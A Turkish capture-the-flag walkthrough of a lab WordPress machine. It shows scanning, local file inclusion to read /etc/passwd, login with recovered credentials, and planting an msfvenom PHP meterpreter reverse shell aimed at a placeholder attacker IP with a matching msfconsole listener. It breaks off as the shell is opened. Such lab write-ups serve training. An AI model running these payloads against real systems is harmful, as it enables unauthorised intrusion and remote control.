İlk öncelikle makinemizi açalım ve görüntüsüne bir bakalım.
Bir giriş ekranı geldi ve şifreyi password.txt dosyasından bulmamızı istiyor.
Makinemizin IP adresini öğrenmek için saldırı makinemizde netdiscover'ı açacağız. Terminale
Kod:
sudo netdiscover
yazalım.
Gördüğünüz gibi IP adresini öğrendik.
Şimdi de nmap taraması yapalım. Bunun için
Kod:
nmap -A IP_adresi
Gördüğünüz gibi 80 ve 22 portları açık. Bir sitesi var demek ki
Siteye gidelim tarayıcımıza IP_ADRESİ yazmanız yeterli olacaktır.
Bir de sitenin dizinlerine bakalım bunun için de dirb aracını kullanacağız. Terminale gelerek
Kod:
dirb http://IP_adresi
yazalım.
Burada /dev ve /wordpress dizinlerini bulduk. Bunlar sitenin wordpress kullandığı anlamına gelir.
Öncelikle /dev[ dizinine bakalım.
Bizlere bir mesaj bırakmış ve buradan bir şey alamadık. Şimdi de Wordpress dizinine gidelim.
Sayfaya biraz göz attığımızda Victor ismine rastladık. Bu da yöneticimiz olabileceği anlamına geliyor. İlk baş nerede rastlamıştık? Makinemizin giriş ekranında.
Şimdi dizinlerden bir yere kadar gidebildik. Belki bir .txt dosyası buluruz umuduyla dirb'e tekrar dönelim. Terminale
Kod:
dirb http://IP-ADRESI -T .txt
yazalım.
Bizlere bir mesajı daha var, bir GitHub adresi vermiş ve l o c a t i o n.txt dosyası olduğunu bizlere söyledi. Önce GitHub adresine bir bakalım.
Kodları incelediğimiz de ve çalıştırmaya çalıştığımız da hiçbiri çalışmadı. Ben de "File" kısmından şüphelendim.
Tarayıcıma gelerek
Kod:
IP_ADRESI/inex.php?file
yazdım ve bir sayfa daha açıldı. Aşağıda yapımcı bizlere bir mesaj bırakmış, "Yanlış dosyayı kazıyorsun" demiş.
Aklıma file parametresinin yanına l o c a ti on.txt yazmak geldi, bizlere ipucunu vermişti hatırlarsanız.
Ve l o c a t i o n.txt dosyasına erişebildik, bunun bizlere söylediği şey LFI açığı olduğudur. Altta da bizlere secrettire360 parametre olarak kullanmamızı söylüyor.
Biraz uğraş sonucu image dizinin de olduğunu buldum. Tarayıcıma
Kod:
IP_ADRESI/image.php?secrettire360=/etc/passwd
yazıyorum.
Ve boom! Bizlere saket dizinin de password.txt dosyası olduğunu gösterdi.
Buna göre bir URL yazıyoruz
Biz bu makine de WordPress kullandıklarını biliyorduk. Sayfa da Wordpress login ekranına gelelim.
Kod:
IP_ADRESS/wordpress/wp-login.php
Şimdi burada kullanıcı adı olarak victor yazacağız, şifre olarakta follow_the_ippsec yazıyoruz ve giriş yapıyoruz.
Giriş yapınca Temalar kısmına gelerek editleme yetkimizin olup olmadığına bakıyoruz. Hiçbirin de yok derken secret.php dosyasını gördük ve ona da bir baktık ki bunda editleme yetkimiz var.
Buraya bir shell atmamız lazım, bunun için de msfvenom kullanacağız. Terminali açalım ve
Kod:
msfvenom -p php/meterpreter/reverse_tcp lhost=Saldiri_Makine_IP_ADRESİ lport=4444 R
yazıyoruz ve shell'imiz hazır. Bunu kopyalayıp secret.php kaydediyoruz.
Bunu kopyalayıp secret.php kaydediyoruz.
Şimdi msfconsole'u açıyoruz ve içine
Kod:
use exploit/multi/handler
yazıyoruz. Ardından gerekli yerleri dolduracağız.
Kod:
set lhost SALDIRGAN_MAKINE_IP_ADRESI
Kod:
set lport 4444
ve
Kod:
exploit
diyoruz.
Dedikten sonra tarayıcımıza gelerek shell'i açıyoruz